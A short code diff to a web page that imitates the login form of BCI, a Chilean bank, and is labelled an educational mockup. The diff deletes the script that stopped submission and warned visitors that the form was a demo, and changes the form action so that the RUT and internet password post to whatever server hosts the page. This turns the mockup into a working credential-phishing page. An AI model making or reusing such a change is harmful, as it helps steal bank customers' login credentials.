--- a/index.html
+++ b/index.html
@@ -125,7 +125,7 @@
     <header class="container">
         <div class="logo">bci</div>
         
-        <form id="login-form" action="#" method="POST">
+        <form id="login-form" action="" method="POST">
             <input type="text" name="rut" placeholder="RUT" required>
             <input type="password" name="clave" placeholder="Clave Internet" required>
             <button type="submit" class="btn">Ingresar</button>
@@ -176,13 +176,6 @@
         </div>
         <div class="footer-bottom"><p>&copy; 2025 BCI. Maqueta con fines educativos.</p></div>
     </footer>
-
-    <script>
-        document.getElementById('login-form').addEventListener('submit', function(event) {
-            event.preventDefault(); 
-            alert('🛡️ ¡Acción detenida! Este es un formulario de demostración y no es funcional. En un sitio real, tus datos se enviarían a un servidor. ¡Siempre verifica la URL antes de ingresar tus credenciales!');
-        });
-    </script>
 
 </body>
 </html>
